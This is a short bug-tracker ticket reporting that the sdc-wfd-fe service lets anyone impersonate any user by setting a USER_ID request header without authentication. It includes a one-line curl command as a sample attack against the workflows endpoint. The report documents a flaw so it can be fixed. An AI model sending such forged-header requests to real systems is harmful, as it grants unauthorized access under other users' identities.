Details
-
Task
-
Status: Fix In Progress
-
High
-
Resolution: Unresolved
-
None
Description
sdc-wfd-fe allows to impersonate any user by setting USER_ID in request
header any without any authentication
Sample attack:
curl -H ’USER_ID: abcd’ -X GET http://<IP ADDR>:30256/wf/workflows